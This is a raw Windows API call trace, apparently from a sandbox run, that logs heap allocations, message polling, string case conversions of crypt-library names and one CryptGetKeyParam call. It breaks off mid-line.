[0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106c8) returned 0x955018 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0032.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106c8) returned 0x88ffb0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.830] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0032.831] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.831] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.831] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.832] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.833] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.833] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0032.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.834] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.836] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.836] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0032.836] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.836] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.837] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, 